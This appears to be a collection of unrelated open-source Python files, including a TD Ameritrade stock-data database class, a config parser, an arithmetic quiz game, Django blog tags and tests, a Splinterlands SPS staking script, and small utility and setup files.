database=self.config.DATABASE,
user=self.config.DB_USER,
password=<PASSWORD>,
)
return connection
def get_freq_type_str(self, frequency_type):
if frequency_type == client.Client.PriceHistory.FrequencyType.DAILY:
return 'daily'
if frequency_type == client.Client.PriceHistory.FrequencyType.MINUTE:
return 'minute'
if frequency_type == client.Client.PriceHistory.FrequencyType.WEEKLY:
return 'weekly'
if frequency_type == client.Client.PriceHistory.FrequencyType.MONTHLY:
return 'monthly'
return 'other'
def get_year_period(self, years):
if years == 1:
return client.Client.PriceHistory.Period.ONE_YEAR
elif years == 2:
return client.Client.PriceHistory.Period.TWO_YEARS
elif years == 3:
return client.Client.PriceHistory.Period.THREE_YEARS
elif years == 5:
return client.Client.PriceHistory.Period.FIFTEEN_YEARS
elif years == 10:
return client.Client.PriceHistory.Period.TEN_YEARS
elif years == 15:
return client.Client.PriceHistory.Period.FIFTEEN_YEARS
elif years == 20:
return client.Client.PriceHistory.Period.TWO_YEARS
else:
print("year must be an integer in (1, 2, 3, 5, 10, 15, 20")
def convert_symbol_price_hx_todataframe(self, res):
if res['empty'] == True:
print("****Empty result****")
return pd.DataFrame()
rows_list = []
#df = pd.DataFrame(columns = ['datetime', 'open', 'high', 'low', 'close','volume'])
for row in res['candles']:
rows_list.append(row)
df = pd.DataFrame(rows_list)[['datetime', 'open', 'high', 'low', 'close','volume']]
df['datetime'] = pd.to_datetime(df['datetime'], unit='ms', utc=True)
df.set_index('datetime', inplace=True, drop=True)
return df
def get_price_history(self, **kwargs):
# call the TD API and grab the json
r = self.td.get_price_history(**kwargs)
j = r.json()
# Make sure there are candles to know that it is not an error
if 'candles' not in j:
print("**** No Candles in Result****")
print(r.json())
return pd.DataFrame()
# If there are candles, make sure the result is not empty
if j['empty'] == True:
print("****Empty result****")
return pd.DataFrame()
# get the dataframe from the candles and save the dataframe as a CSV file
df = self.convert_symbol_price_hx_todataframe(j)
return df
def get_fundamentals(self, symbol):
r = self.td.search_instruments(symbol, client.Client.Instrument.Projection.FUNDAMENTAL)
j = r.json()
try:
fund = j[symbol]['fundamental']
fund['datetime'] = datetime.datetime.now()
except:
try:
# We have have sent too many API calls, stop the program
if j['error'] == "Individual App\'s transactions per seconds restriction reached. Please contact us with further questions":
sys.exit(1)
except:
# Must have been another error, print the JSON and then set fund to None
print("ERROR=============")
print(j)
print("==================")
fund = None
return fund
'''
Function to get a standand intraday candles for every 5 minutes for the supplied period. Period type
is `DAY`
'''
def get_price_intraday_history(self, symbol, period=client.Client.PriceHistory.Period.THREE_MONTHS):
period_type=client.Client.PriceHistory.PeriodType.DAY
frequency_type=client.Client.PriceHistory.FrequencyType.MINUTE
frequency=client.Client.PriceHistory.Frequency.EVERY_FIVE_MINUTES
return self.get_price_history(symbol=symbol,period_type=period_type,period=period,frequency_type=frequency_type,frequency=frequency)
'''
Function to get a standand daily candles for the supplied period. Period type
is `YEAR`
'''
def get_price_daily_history(self, symbol, period=client.Client.PriceHistory.Period.TWENTY_YEARS):
period_type=client.Client.PriceHistory.PeriodType.YEAR
frequency_type=client.Client.PriceHistory.FrequencyType.DAILY
frequency=client.Client.PriceHistory.Frequency.DAILY
return self.get_price_history(symbol=symbol,period_type=period_type,period=period,frequency_type=frequency_type,frequency=frequency)
def get_standard_5min_price_history(self, start_datetime, symbol):
frequency_type=client.Client.PriceHistory.FrequencyType.MINUTE
frequency=client.Client.PriceHistory.Frequency.EVERY_FIVE_MINUTES
end_datetime = datetime.datetime.now()
return self.get_price_history(symbol=symbol,end_datetime=end_datetime, start_datetime=start_datetime,frequency_type=frequency_type,frequency=frequency)
'''
Database Functions
'''
'''
Run a select query and get back a rowset
'''
def run_select_query(self, query):
cursor = self.conn.cursor()
cursor.execute(query)
row = cursor.fetchall()
cursor.close()
return row
'''
Run a select query with a parameter and get back a rowset
'''
def run_select_query_with_param(self, query, param):
cursor = self.conn.cursor()
cursor.execute(query, param)
row = cursor.fetchall()
if len(row) == 0:
print("There are no results for this query")
cursor.close()
return row
'''
Returns a list of tuples (stock_id, symbol). If exchance provided, it will limit stocks to only from that exchange.
When includevariants is False is will exclude stocks symbols for stock variants (ie. AVD^C)
'''
def get_stocks_id_symbol(self, exchange=None, includevariants=False):
cursor = self.conn.cursor()
if exchange is None:
if not includevariants:
cursor.execute("SELECT id, symbol FROM stock WHERE symbol NOT SIMILAR TO %s ", ('%(\^|/)%',))
else:
cursor.execute("SELECT id, symbol FROM stock")
else:
if not includevariants:
cursor.execute("SELECT id, symbol FROM stock WHERE symbol NOT SIMILAR TO %s AND exchange = %s", ('%(\^|/)%',exchange,))
else:
cursor.execute("SELECT id, symbol FROM stock WHERE exchange = %s", (exchange,))
stocks = []
rows = cursor.fetchall()
for row in rows:
stocks.append((row[0], row[1]))
cursor.close()
return stocks
'''
Save the JSON fundamentals from TD Ameritrade API for a stock. stock_id is the primary key for the stock in the database.
'''
def save_fundamentals(self, stock_id, fund):
if fund is None:
print("No Fundamentals json provided")
else:
cursor = self.conn.cursor()
query_insert = "INSERT INTO stock_fundamental (dt, stock_id, fundamental_id, val) VALUES (%s,%s,%s,%s)"
dt = fund['datetime']
keys = fund.keys()
for k in keys:
if k not in ['datetime', 'symbol', 'dividendDate', 'dividendPayDate']:
cursor.execute(query_getfund, (k,))
r = cursor.fetchone()
if r is not None:
cursor.execute(query_insert, (dt, stock_id, r[0], fund[k]))
else:
print("{} symbol not found in fundamental table".format(k))
self.conn.commit()
cursor.close()
def save_price_history(self, stock_id, start_datetime, symbol):
cursor = self.conn.cursor()
df = self.get_standard_5min_price_history(start_datetime, symbol)
query_insert = "INSERT INTO ohlc_data (dt, stock_id, open, high, low, close, volume ) VALUES(%s, %s, %s, %s, %s, %s, %s)"
for index, r in df.iterrows():
cursor.execute(query_insert, (r.name, stock_id, r['open'],r['high'],r['low'],r['close'],r['volume'],))
self.conn.commit()
cursor.close()
| 2.5 | 2 |
prometheus_adaptive_cards/config/settings_raw.py | trallnag/prometheus-adaptive-cards | 0 | 12767442 | """
Module made to merge and process all configs for PromAC into a single nested
dictionary. Ready to be injected into the settings models that PromAC uses.
Copyright © 2020 <NAME> - Licensed under the Apache License 2.0
"""
import os
from box import Box
from loguru import logger
import prometheus_adaptive_cards.config.settings_utils as settings_utils
def _parse_args(args: list[str]) -> Box:
"""Parses arguments into nested dict.
Args:
args (list[str]):
List of all arguments passed to program. Use it like this:
`parse_args(sys.argv[1:])`. Args must start with one or two dashes
and only contain lower case chars, period and underscores.
Returns:
Box:
Lowercased. Box instead of dict. Already nested. Can be used just
like a dictionary. Read more [here](https://github.com/cdgriffith/Box).
Type casting is NOT done here. `box_dots` is `True`.
"""
logger.bind(args_to_parse=args).debug("Parse list of arguments.")
if len(args) % 2 != 0:
raise ValueError("Number of args must be not odd.")
names, values = args[::2], args[1::2]
cli_args_dict = {}
for idx in range(len(names)):
name = names[idx]
value = values[idx]
if name.startswith("--"):
cli_args_dict[name[2:]] = value
elif name.startswith("-"):
cli_args_dict[name[1:]] = value
return Box(settings_utils.unflatten(cli_args_dict), box_dots=True)
def _parse_files(
force_file: str or None = None, lookup_override: list[str] or None = None
) -> dict[str]:
"""Parses config from files and merges them together.
Args:
force_file (str or None, optional):
If set, this location will be the only one checked (in addition to
`.local.`). Should point to arg from CLI or env var. Defaults to `None`.
lookup_override (list[str] or None, optional):
If set, the given list of locations will be used to look for files
instead of the included one. Should generally only be necessary
during unit testing. Defaults to `None`.
Returns:
dict[str]: Represents the merged version of all found YAML files. If no
files have been parsed the returned `dict` will be empty.
"""
logger.bind(force_file=force_file, lookup_override=lookup_override).debug(
"Parse and merge files."
)
if force_file:
logger.debug(f"Only file '{force_file}' is considered.")
locations = settings_utils.generate_locations([force_file])
else:
locations = settings_utils.generate_locations(
lookup_override
or [
f"{os.path.dirname(__file__)}/promac.yml",
"/etc/promac/promac.yml",
]
)
configs = settings_utils.parse_yamls(locations)
settings = {}
if len(configs) > 1:
settings = configs[0]
settings_utils.merge(settings, configs[1:])
elif len(configs) > 0:
settings = configs[0]
return settings
def _parse_env_vars(all_env_vars: dict[str, str]) -> Box:
"""Extracts and transforms given dict of env vars.
Args:
all_env_vars (dict[str, str]): Environment variables.
Returns:
Box:
Lowercased. Box instead of dict. Already nested. Can be used just
like a dictionary. Read more [here](https://github.com/cdgriffith/Box).
Type casting is NOT done here. `box_dots` is `True`.
"""
logger.bind(all_env_vars=all_env_vars).debug("Parse env vars.")
env_vars = {}
for name, value in all_env_vars.items():
if name.startswith("PROMAC__") and len(name) > 8:
env_vars[name[8:].lower().replace("__", ".")] = value
return Box(settings_utils.unflatten(env_vars), box_dots=True)
def _cast_vars(box: Box) -> None:
"""Casts box fields to correct type in-place. No content validation.
Args:
box (Box): Nested Box with `box_dots=True`.
"""
logger.debug("Cast vars.")
settings_utils.cast(box, "logging.structured.custom_serializer", bool)
settings_utils.cast(box, "logging.unstructured.colorize", bool)
settings_utils.cast(box, "server.port", int)
def setup_raw_settings(cli_args: list[str], env: dict[str, str]) -> dict:
"""Creates one single dict that contains all settings for PromAC.
Args:
args (list[str]):
List of all arguments passed to program. Use it like this:
`parse_args(sys.argv[1:])`. Args must start with one or two dashes
and only contain lower case chars, period and underscores.
env (dict[str, str]): Dict with all enviornment variables.
Returns:
dict: Nested dictionary with all settings unvalidated.
"""
logger.debug("Parse CLI args with argparse.")
cli_args_box = _parse_args(cli_args)
logger.debug("Find, parse and merge YAML config files.")
config_file = cli_args_box.get("config_file", os.environ.get("CONFIG_FILE", None))
collected_settings_dict = _parse_files(force_file=config_file)
logger.debug("Extract and parse relevant env vars and merge into settings.")
env_vars_box = _parse_env_vars(env)
_cast_vars(env_vars_box)
settings_utils.merge(collected_settings_dict, env_vars_box.to_dict())
logger.debug("Extract and parse relevant CLI args")
if cli_args_box.get("config_file"):
del cli_args_box["config_file"]
_cast_vars(cli_args_box)
settings_utils.merge(collected_settings_dict, cli_args_box.to_dict())
return collected_settings_dict
| 2.890625 | 3 |
mathgame.py | rg3/mathgame | 0 | 12767443 | #!/usr/bin/env python
# SPDX-FileCopyrightText: 2021 <NAME> <<EMAIL>>
# SPDX-License-Identifier: MIT
import random
import sys
class Operation(object):
def valid (self, a, b):
return True
def result(self, a, b):
raise TypeError
def symbol(self):
raise TypeError
class Addition(Operation):
def __init__(self):
pass
def result(self, a, b):
return a+b
def symbol(self):
return "+"
class Multiplication(Operation):
def __init__(self):
pass
def result(self, a, b):
return a*b
def symbol(self):
return "*"
class Substraction(Operation):
def __init__(self):
pass
def valid(self, a, b):
return a >= b
def result(self, a, b):
return a-b
def symbol(self):
return "-"
class TableGenerator(object):
def __init__(self, used_operation):
self.usedOperation = used_operation
def table(self, a):
result = []
for i in range(1,10+1):
if self.usedOperation.valid(a, i):
result.append((a, i))
return result
class Game(object):
def __init__(self, table_generator, used_operation, combiner_min, combiner_max):
self.tableGenerator = table_generator
self.usedOperation = used_operation
self.combinations = []
for i in range(combiner_min, combiner_max+1):
self.combinations.extend(self.tableGenerator.table(i))
self.quitAnswer = "q"
def run(self):
print("Welcome! To quit the game, answer '%s' to any question" % (self.quitAnswer,))
questions = []
while True:
if len(questions) == 0:
questions = self.combinations[:]
random.shuffle(questions)
next_idx = random.choice(range(0, len(questions)))
question = questions[next_idx]
del questions[next_idx]
continue_playing = self.ask(question)
if not continue_playing:
break
def ask(self, question):
correct_sign = "\u2713 Yes!"
incorrect_sign = "\u2717 No"
a, b = question
correct_answer = self.usedOperation.result(a, b)
while True:
answer = input("%s %s %s = " % (a, self.usedOperation.symbol(), b))
if answer.lower() == self.quitAnswer:
return False
try:
numerical_answer = int(answer)
if numerical_answer == correct_answer:
print(correct_sign)
break
else:
print(incorrect_sign)
except ValueError:
print(incorrect_sign)
return True
if __name__ == "__main__":
def usage():
sys.exit("Usage: %s add|sub|mul NUMBER_FROM_1_TO_10" % (sys.argv[0], ))
if len(sys.argv) != 3:
usage()
operation_arg = sys.argv[1]
max_table_arg = sys.argv[2]
operation_classes = dict()
operation_classes['add'] = Addition
operation_classes['sub'] = Substraction
operation_classes['mul'] = Multiplication
if operation_arg not in operation_classes:
usage()
used_operation = operation_classes[operation_arg]()
table_generator = TableGenerator(used_operation)
try:
max_value = int(max_table_arg)
if max_value < 1 or max_value > 10:
raise ValueError
except ValueError:
usage()
game = Game(table_generator, used_operation, 1, max_value)
try:
game.run()
except KeyboardInterrupt:
print("\n")
| 3.4375 | 3 |
blog/templatetags/blog_tags.py | masod-abbasian/mysite | 2 | 12767444 | <filename>blog/templatetags/blog_tags.py
from django import template
from blog.models import POST,Comment
from blog.models import Category
register = template.Library()
@register.simple_tag(name="totalposts")
def function():
posts = POST.objects.filter(status=1).count()
return posts
@register.simple_tag(name="comments_count")
def function(pid):
return Comment.objects.filter(post = pid,approved=True).count()
@register.simple_tag(name="posts")
def function():
posts = POST.objects.filter(status=1)
return posts
@register.filter
def snippet(value,arg=20):
return value[:arg] + "..."
@register.inclusion_tag('blog/blog-popular-post.html')
def latestposts(arg=2):
postes = POST.objects.filter(status=1).order_by('-published_date')[:arg]
return {'postes':postes}
@register.inclusion_tag('blog/blog-category.html')
def postcategory():
posts = POST.objects.filter(status=1)
categories = Category.objects.all()
cat_dict = {}
for name in categories:
cat_dict[name] = posts.filter(category = name).count()
return {'categories': cat_dict}
| 2.375 | 2 |
sps-auto-utilities.py | 0xBXIII/SPS-Auto-Utilities | 3 | 12767445 | <reponame>0xBXIII/SPS-Auto-Utilities
from beem import Hive
from beem.account import Account
import beemgraphenebase.ecdsasig
from binascii import hexlify
from datetime import datetime
from time import time
import requests
import sys
import yaml
from yaml.loader import SafeLoader
APP_NAME = 'sps-auto-utilities'
def stake(hive: Hive, hive_name: str, sps: float):
# Stake SPS
hive.custom_json("sm_stake_tokens", required_posting_auths=[hive_name],
json_data=f"{{\"token\":\"SPS\",\"qty\":{sps},\"app\":\"{APP_NAME}\"}}")
# Log amount staked
timestamp = datetime.now()
print(f"{timestamp} | {hive_name} | Staked {sps}")
def claim_hive_sps_airdrop(hive_name: str, posting_key: str):
# Login to Splinterlands to get token
timestamp = int(time() * 1000)
sig_bytes = beemgraphenebase.ecdsasig.sign_message(f"{hive_name}{timestamp}", posting_key)
signature = hexlify(sig_bytes).decode("ascii")
token = None
try:
login_response = requests.get(f"https://api2.splinterlands.com/players/login?name={hive_name}&ts={timestamp}"
f"&sig={signature}").json()
token = login_response['token']
except:
print(f"ERROR: Could not log in to Splinterlands for token with account {hive_name}",file=sys.stderr)
return
# Claim Airdrop
try:
claim_sig_bytes = beemgraphenebase.ecdsasig.sign_message(f"hive{hive_name}{timestamp}", posting_key)
claim_signature = hexlify(claim_sig_bytes).decode("ascii")
result = requests.get(f"https://ec-api.splinterlands.com/players/claim_sps_airdrop?platform=hive&address={hive_name}"
f"&sig={claim_signature}&token={token}&username={hive_name}&ts={timestamp}")
if result.json()['success'] is True:
timestamp = datetime.now()
print(f"{timestamp} | {hive_name} | Claimed SPS Airdrop from HIVE Assets", file=sys.stderr)
except:
print(f"ERROR: Could not claim HIVE SPS airdrop with account {hive_name}", file=sys.stderr)
return
if len(sys.argv) != 2:
print('ERROR: Invalid usage - please only supply exactly one config file path', file=sys.stderr)
exit(1)
with open(sys.argv[1]) as config_file:
config = yaml.load(config_file, Loader=SafeLoader)
hive_node = config['hive-node']
for account in config['accounts']:
# Wallet Setup
hive_name = account['name']
keys = []
has_active_key = False
if 'posting-key' in account.keys():
keys.append(account['posting-key'])
if 'active-key' in account.keys():
has_active_key = True
keys.append(account['active-key'])
if len(keys) == 0:
print(f"ERROR: No keys for {hive_name}", file=sys.stderr)
continue
hive = Hive(keys=keys, node=hive_node)
hive_account = Account(hive_name, blockchain_instance=hive)
# Find how much SPS is liquid
# This does NOT include airdrops
balances = []
try:
balances = requests.get(f'https://api.splinterlands.io/players/balances?username={hive_name}').json()
except:
print(f"ERROR: Could not fetch Splinterlands balances for {hive_name}", file=sys.stderr)
continue
sps = 0 # Defaulting to 0 to claim only
for balance in balances:
if balance['token'] == 'SPS':
sps = balance['balance']
break
for action in account['actions']:
if action == 'stake':
stake(hive, hive_name, sps)
elif action == 'claim-hive-sps-airdrop':
claim_hive_sps_airdrop(hive_name, account['posting-key'])
else:
print(f"ERROR: Invalid action ({action}) supplied for {hive_name}", file=sys.stderr)
| 2.203125 | 2 |
students/tests/test_student_views.py | ovod88/studentsdb | 0 | 12767446 | from datetime import datetime
from django.test import TestCase, Client
from django.urls import reverse
from students.models.students import Student
from students.models.groups import Group
class TestStudentList(TestCase):
def setUp(self):
# create 2 groups
group1, created = Group.objects.get_or_create(
title="MtM-1")
group2, created = Group.objects.get_or_create(
title="MtM-2")
# create 4 students: 1 for group1 and 3 for group2
Student.students.get_or_create(
first_name="Vitaliy",
last_name="Podoba",
birthday=datetime.today(),
ticket='12345',
student_group=group1)
Student.students.get_or_create(
first_name="John",
last_name="Dobson",
birthday=datetime.today(),
ticket='23456',
student_group=group2)
Student.students.get_or_create(
first_name="Sam",
last_name="Stefenson",
birthday=datetime.today(),
ticket='34567',
student_group=group2)
Student.students.get_or_create(
first_name="Arnold",
last_name="Kidney",
birthday=datetime.today(),
ticket='45678',
student_group=group2)
# remember test browser
self.client = Client()
# remember url to our homepage
self.url = reverse('home')
def test_students_list(self):
# make request to the server to get homepage page
response = self.client.get(self.url)
# print(response.context)
# have we received OK status from the server?
self.assertEqual(response.status_code, 200)
# do we have student name on a page?
self.assertIn('Vitaliy', str(response.content))
# do we have link to student edit form?
self.assertIn(reverse('students_edit',
kwargs={'pk': Student.students.all()[0].id}),
str(response.content))
# ensure we got 3 students, pagination limit is 3
self.assertEqual(len(response.context['students']), 3)
def test_current_group(self):
# # set group1 as currently selected group
group = Group.objects.filter(title="MtM-1")[0]
self.client.cookies['current_group'] = group.id
# # make request to the server to get homepage page
response = self.client.get(self.url)
# # in group1 we have only 1 student
self.assertEqual(len(response.context['students']), 1)
def test_order_by(self):
# # set order by Last Name
response = self.client.get(self.url, {'order_by': 'last_name'})
# # now check if we got proper order
students = response.context['students']
self.assertEqual(students[0].last_name, 'Dobson')
self.assertEqual(students[1].last_name, 'Kidney')
self.assertEqual(students[2].last_name, 'Podoba')
def test_reverse_order_by(self):
# # order students by ticket number in reverse order
response = self.client.get(self.url, {'order_by': 'ticket',
'reverse': '1'})
# # now check if we got proper order
students = response.context['students']
self.assertEqual(students[0].last_name, 'Kidney')
self.assertEqual(students[1].last_name, 'Stefenson')
self.assertEqual(students[2].last_name, 'Dobson')
def test_pagination(self):
# # navigate to second page with students
response = self.client.get(self.url, {'page': '2'})
# self.assertEqual(response.context['is_paginated'], True)
self.assertEqual(len(response.context['students']), 1)
self.assertEqual(response.context['students'][0].last_name, 'Stefenson')
| 2.5625 | 3 |
research/test_singleton.py | FXTD-ODYSSEY/QBinder | 13 | 12767447 | <filename>research/test_singleton.py
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
__author__ = 'timmyliang'
__email__ = '<EMAIL>'
__date__ = '2020-10-30 19:42:26'
import inspect
import threading
from PySide2 import QtCore
class SingletonType(type):
_instance_lock = threading.Lock()
def __init__(cls, name, bases, dic):
super(SingletonType, cls).__init__(name, bases, dic)
# print(cls,name,bases,dic)
def __call__(cls, *args, **kwargs):
# print(args)
if not hasattr(cls, "_instance"):
with SingletonType._instance_lock:
if not hasattr(cls, "_instance"):
cls._instance = super(SingletonType,cls).__call__(*args, **kwargs)
cls._instance.__addvar__(*args)
return cls._instance
# def __new__(cls, name, bases, attrs):
# # print(name,bases,attrs)
# return super(SingletonType,cls).__new__(cls, name, bases, attrs)
class Binding(object):
def __init__(self,val):
self.__val = val
# def __get__(self, instance, owner):
# return self.__val
# def __set__(self, instance, val):
# self.__val = val
class GBinding(Binding):
pass
class DataBinding(type):
def __init__(cls, name, bases, attrs):
super(DataBinding, cls).__init__(name, bases, attrs)
for member,val in inspect.getmembers(cls):
if isinstance(val,Binding):
print(member,val)
def connect_binding(cls):
""" https://stackoverflow.com/questions/11091609/setting-a-class-metaclass-using-a-decorator """
__dict = dict(cls.__dict__)
__dict["__metaclass__"] = DataBinding
__dict["__wrapped__"] = cls
return(DataBinding(cls.__name__, cls.__bases__, __dict))
class StateDescriptor(QtCore.QObject):
def __getitem__(self,key):
return self.__dict__[key]
def __setitem__(self,key,value):
self.__dict__[key] = value
def __setattr__(self, key, value):
print("attr",key,value)
self.__dict__[key] = value
@connect_binding
class Component(object):
state = StateDescriptor()
state.number = 1
state.string = "1"
state.loc = True
def __init__(self,*args,**kwargs):
super(Component, self).__init__(*args,**kwargs)
number = self.state.number
string = self.state.string
print(number,string)
comp = Component()
# print(dir(comp.temple)) | 2.546875 | 3 |
Python/Programming Fundamentals/Text Processing/13. Substring.py | teodoramilcheva/softuni-software-engineering | 0 | 12767448 | first_str = input()
second_str = input()
while first_str in second_str:
second_str = second_str.replace(first_str, '')
print(second_str) | 3.609375 | 4 |
setup.py | gingerphoenix10/ClockPython | 0 | 12767449 | <filename>setup.py<gh_stars>0
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='ClockPython',
version='0.0.1',
description='Gets the current 12 or 24 hour time',
py_modules=["clockpython"],
package_dir={'': 'src'},
classifiers=[
"Programming Language :: Python :: 3.10",
"License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)",
"Operating System :: OS Independent",
],
long_description=long_description,
long_description_content_type="text/markdown",
extras_require = {
"dev": [
"pytest>=3.7",
],
},
url="https://github.com/gingerphoenix10/ClockPython",
author="gingerphoenix10",
author_email="<EMAIL>"
) | 1.5 | 2 |
Supermicro/benchmarks/bert/implementations/pytorch_SYS-420GP-TNAR/unit_test/test_main.py | gglin001/training_results_v1.1 | 27 | 12767450 | # NVIDIA
import unittest
from test_bert_batch_1 import *
#from test_bert_batch_7 import *
from test_embeddings_batch_1 import *
from test_encoders_batch_1 import *
if __name__ == '__main__':
unittest.main(verbosity=2)
| 1.257813 | 1 |